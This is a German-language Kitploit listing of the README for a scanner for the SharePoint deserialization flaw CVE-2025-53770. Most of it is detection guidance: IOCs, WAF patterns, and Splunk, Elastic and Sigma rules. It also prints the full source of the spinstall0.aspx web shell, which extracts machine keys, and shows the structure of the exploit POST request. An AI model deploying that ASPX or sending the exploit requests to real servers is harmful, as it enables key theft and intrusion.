Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-53770-Scanner — ToolShell Scanner - CVE-2025-53770 und Erkennungsinformationen | Kitploit
Tools/GitHubGitHub/zephrfish/cve-2025-53770-scanner
DefensivwerkzeugeManagement von Indicators of Compromise (IOC)SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsBedrohungsanalyseIncident ResponseLog-Analyse
GitHubzephrfish/cve-2025-53770-scanner

CVE-2025-53770-Scanner

ToolShell Scanner - CVE-2025-53770 und Erkennungsinformationen

1855vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

CVE-2025-53770 SharePoint-Schwachstellenscanner

100% zusammengehackt mit all den Tweets, die mit Payloads und verschiedenen Angriffen herumfliegen, also ohne Gewähr usw. Der Scanner ist darauf ausgelegt, anfällige Instanzen zu identifizieren und verfügt über eine Konfiguration, die bekannte Nutzungen in freier Wildbahn bei Ausnutzung enthält. Er ist hauptsächlich für den defensiven Einsatz konzipiert, um anfällige Instanzen zu identifizieren und Ihnen die Möglichkeit zu geben, Patches anzuwenden.

Dieser Scanner führt automatisierte Überprüfungen von SharePoint-Bereitstellungen durch:

  • Senden von maßgeschneiderten POST-Anfragen an SharePoint ToolPane-Endpunkte mit Exploit-Payloads
  • Erkennung von Versuchen zur Extraktion von Maschinenschlüsseln und erfolgreicher Ausnutzung
  • Identifizierung der Bereitstellung sekundärer Payloads (spinstall0.aspx)
  • Analyse von Antworten auf Schwachstellenindikatoren basierend auf beobachteten Angriffsmustern
  • Bereitstellung detaillierter Berichte mit Vertrauensstufen und sofortigen Aktionswarnungen
  • Unterstützung von gleichzeitigem Scannen für Effizienz

Wichtige Erkennungsfunktionen

KRITISCH: Erkennung von Maschinenschlüssel-Extraktion

  • Erkennt erfolgreiche Antworten auf die Extraktion von Maschinenschlüsseln
  • Identifiziert die Offenlegung von ValidationKey, DecryptionKey und CompatibilityMode
  • Erkennt durch Pipe getrennte Maschinenschlüsselmuster (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
  • Löst sofortige Aktionswarnungen für kompromittierte Systeme aus

Erkennung sekundärer Payloads

  • Identifiziert Bereitstellungsversuche von spinstall0.aspx
  • Erkennt C# ASP.NET-Payload-Codemuster
  • Erkennt Verwendung von System.Web.Configuration.MachineKeySection
  • Versionsspezifische Pfaderkennung (SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\)

Installation

  1. Repository klonen:
root@kitploit:~
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  1. Abhängigkeiten installieren:
root@kitploit:~
pip install -r requirements.txt

Verwendung

Grundlegende Verwendung

Erstellen Sie eine Textdatei mit den Zielhosts (einer pro Zeile):

root@kitploit:~
sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

Scanner ausführen:

root@kitploit:~
python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

Befehlszeilenoptionen

OptionBeschreibungStandard
-i, --inputPfad zur Hostliste (erforderlich)-
-o, --outputAusgabedatei für Ergebnisse (.json, .csv, .txt)Keine
-l, --logfileProtokolldateipfad für detaillierte ProtokollierungKeine
-t, --threadsAnzahl gleichzeitiger Threads10
-v, --verboseAusführliche Ausgabe und Protokollierung aktivierenFalse

Ausgabeformate

JSON-Ausgabe (-o results.json)

root@kitploit:~
[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

CSV-Ausgabe (-o results.csv)

Liefert tabellarische Daten für die Analyse in Tabellenkalkulationen mit Spalten für alle Scanmetriken.

Textausgabe (-o results.txt)

Menschenlesbares Format mit Schwachstellenstatus und Scan-Details.

Details zur Schwachstelle

CVE-2025-53770 zielt auf eine Deserialisierungsschwachstelle in der ExcelDataSet-Komponente von SharePoint ab, die aktiv in freier Wildbahn ausgenutzt wird. Der Scanner erkennt:

Identifizierte Angriffsmuster

  1. Erste Ausnutzung: POST-Anfrage an /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx mit serialisiertem Payload
  2. Maschinenschlüssel-Extraktion: Erfolgreiche Ausnutzung gibt durch Pipe getrennte Maschinenkonfiguration zurück:
    root@kitploit:~
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
    Beispiel: [128-256 hex chars]|HMACSHA256|[48-96 hex chars]|AES|Framework45
    
  3. Sekundärer Payload: Bereitstellung von spinstall0.aspx für dauerhaften Zugriff und Schlüsselextraktion
  4. Version Targeting: Unterschiedliche Pfade für SharePoint-Versionen (15/ vs 16/ layouts)

Bestätigte IOCs aus aktiver Ausnutzung

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer: /_layouts/SignOut.aspx
  • Content-Length: Typischerweise 7699-8000+ Bytes
  • Payload-Größe: Große Base64-codierte CompressedDataTable-Parameter
  • Antwortindikatoren: Maschinenschlüssel-Zeichenfolgen, spinstall0.aspx-Bereitstellung
  • Angriffsinfrastruktur: 65.38.121.198, 162.243.204.189, 165.22.18.129

Erkennungslogik

Der Scanner analysiert Antworten auf:

  1. Muster zur Maschinenschlüssel-Extraktion (KRITISCHE Vertrauensstufe)
  2. Indikatoren für sekundäre Payloads (HOHE Vertrauensstufe)
  3. Verarbeitung von ExcelDataSet/Scorecard-Komponenten (MITTELERE Vertrauensstufe)
  4. ToolPane-Fehlermuster und anomale Antwortmerkmale (NIEDRIGE Vertrauensstufe)

Sicherheitshinweise

  • Dieses Tool ist ausschließlich für autorisierte Sicherheitstests bestimmt
  • Stellen Sie sicher, dass Sie vor dem Scannen von Systemen die entsprechende Autorisierung haben
  • Der Scanner verwendet standardmäßig HTTPS, akzeptiert aber selbstsignierte Zertifikate
  • Protokolle können sensible Informationen enthalten – sichern Sie diese angemessen
  • Berücksichtigen Sie die Netzwerklast bei Verwendung einer hohen Thread-Anzahl

Beispiel einer Scan-Sitzung

root@kitploit:~
$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json

Fehlerbehebung

Häufige Probleme

  1. Verbindungszeitüberschreitungen: Erhöhen Sie das Timeout oder reduzieren Sie die Thread-Anzahl
  2. SSL-Fehler: Der Scanner deaktiviert standardmäßig SSL-Warnungen
  3. Berechtigungsfehler: Stellen Sie Schreibzugriff für Ausgabe-/Protokolldateien sicher
  4. Speichernutzung: Überwachen Sie diese bei großen Host-Listen

Protokollanalyse

Aktivieren Sie die ausführliche Protokollierung (-v) und Protokolldateien (-l) für eine detaillierte Fehlerbehebung:

root@kitploit:~
tail -f scan.log

Exploit-Analyse

Beobachtete Angriffs-Payloads

Der Scanner integriert die Erkennung bestätigter Ausbeutungsmuster, die bei aktiven Angriffen beobachtet wurden:

Primäre Payload-Struktur

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]

Sekundärer Payload (spinstall0.aspx)

root@kitploit:~
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

Erwartetes Antwortformat des Maschinenschlüssels

root@kitploit:~
ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string] 
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40

Anleitung zur Erkennung und Überwachung

Erkennung von Ausnutzungsversuchen von CVE-2025-53770

Organisationen sollten die folgenden Erkennungsmechanismen implementieren, um potenzielle Ausnutzungsversuche zu identifizieren:

1. Web Application Firewall (WAF)-Regeln

Überwachen Sie auf verdächtige POST-Anfragen an SharePoint ToolPane-Endpunkte:

root@kitploit:~
# Beispiel für WAF-Erkennungsregelmuster
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Query string: "DisplayMode=Edit&a=/ToolPane.aspx"
Request body containing: "MSOTlPn_Uri", "MSOTlPn_DWP"
Request body containing: "ExcelDataSet", "CompressedDataTable"
Request body containing: "Scorecard:ExcelDataSet"
Request body containing: "H4sIAAAAAAAEA" (gzip magic bytes in base64)
Content-Length > 5000 bytes (typical payload size)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx

beobachtete Ausnutzungsmuster:

  • Payload-Größen typischerweise 7000-8000+ Bytes
  • URL-codierte komprimierte Daten im CompressedDataTable-Parameter
  • Spezifische User-Agent-Zeichenfolge: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
  • Content-Type: application/x-www-form-urlencoded
  • Connection: close-Header oft vorhanden
  • Base64-codierte serialisierte .NET-Objekte im Payload
  • Antwort enthält Maschinenschlüssel im Pipe-getrennten Format
  • Sekundäre Anfragen an bereitgestellte spinstall0.aspx-Dateien

2. SharePoint ULS-Protokolle

Überwachen Sie SharePoint Unified Logging Service (ULS)-Protokolle auf:

root@kitploit:~
Category: SharePoint Foundation Web Controls
Level: Unexpected, Error, Critical
Keywords: "ToolPane", "ExcelDataSet", "Deserialization"
Process: w3wp.exe

Wichtige Indikatoren in ULS-Protokollen:

  • Unerwartete Ausnahmen bei der Verarbeitung von ToolPane.aspx
  • Deserialisierungsfehler in Microsoft.PerformancePoint-Komponenten
  • Speicherkorruption oder Prozessabstürze in w3wp.exe

3. IIS-Zugriffsprotokolle

Überwachen Sie IIS-Protokolle auf Ausnutzungsmuster:

root@kitploit:~
# Log analysis queries (replace with your SIEM syntax)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (typical exploit payload size)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (slow processing indicating deserialization)

Spezifische IOCs aus echten Angriffen:

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Body contains: MSOTlPn_Uri=http%3A%2F%2F[domain]%2F_controltemplates%2F15%2FAclEditor.ascx
Body contains: CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ

4. Netzwerkverkehrsanalyse

Überwachen Sie den Netzwerkverkehr auf:

  • Ungewöhnliche POST-Anfragegrößen an SharePoint-Server
  • Wiederholte Anfragen an ToolPane.aspx von einzelnen Quellen
  • Base64-codierte Payloads in HTTP-POST-Texten
  • Nicht-Browser-User-Agent-Zeichenfolgen, die auf SharePoint abzielen

5. Windows-Ereignisprotokolle

Überwachen Sie Windows-Ereignisprotokolle auf SharePoint-Servern:

root@kitploit:~
Event Log: Application
Source: ASP.NET, SharePoint Foundation
Event IDs: 1309, 1310 (application errors)
Event Log: System
Source: Application Error
Process: w3wp.exe crashes

6. SIEM-Erkennungsregeln

Splunk-Erkennungsabfrage:
root@kitploit:~
index=iis source="*iis*" 
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size
Erweiterte Erkennung für echte Angriffe:
root@kitploit:~
index=iis 
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Other")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status
Elastic/Kibana-Abfrage:
root@kitploit:~
{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}
Sigma-Regel für CVE-2025-53770:
root@kitploit:~
title: CVE-2025-53770 SharePoint ExcelDataSet Exploitation
id: cve-2025-53770-sharepoint-exploit
description: Detects exploitation attempts of CVE-2025-53770 SharePoint deserialization vulnerability
references:
    - https://github.com/your-repo/CVE-2025-53770-Scanner
author: Security Team
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes: 
            - gte: 7000
            - lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Legitimate SharePoint administrative activities
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770

7. Verhaltensindikatoren

Achten Sie auf diese Verhaltensweisen nach der Ausnutzung:

  • Ungewöhnliche ausgehende Netzwerkverbindungen von SharePoint-Servern
  • Neue Benutzerkonten, die in SharePoint oder Active Directory erstellt wurden
  • Nicht autorisierte Datei-Uploads oder -Änderungen
  • Versuche der Privilegienausweitung
  • Seitwärtsbewegung zu anderen Systemen

Empfohlene Reaktionsmaßnahmen

  1. Sofortige Reaktion:

    • Verdächtige Quell-IPs an Firewall/WAF blockieren
    • Betroffene SharePoint-Server isolieren, wenn Ausnutzung bestätigt
    • Protokolle und Speicherabbilder für forensische Analysen aufbewahren
  2. Untersuchung:

    • POST-Anfrage-Payloads auf schädlichen Inhalt analysieren
    • Auf Anzeichen erfolgreicher Codeausführung prüfen
    • Benutzerkontenaktivitäten und Berechtigungsänderungen überprüfen
    • Mit anderen Sicherheitsereignissen korrelieren
  3. Eindämmung:

    • Sicherheitspatches sofort anwenden
    • WAF-Regeln implementieren, um Ausnutzungsversuche zu blockieren
    • SharePoint-Server von kritischen Netzwerkressourcen segmentieren

Beispiele für SIEM-Integration

Import von Scan-Ergebnissen in Splunk:

root@kitploit:~
# Konvertieren der Scan-Ergebnisse für Splunk-Erfassung
python3 scanner.py -i hosts.txt -o results.json
# Import in Splunk-Index
curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector" \
  -d @results.json
Tool herunterladen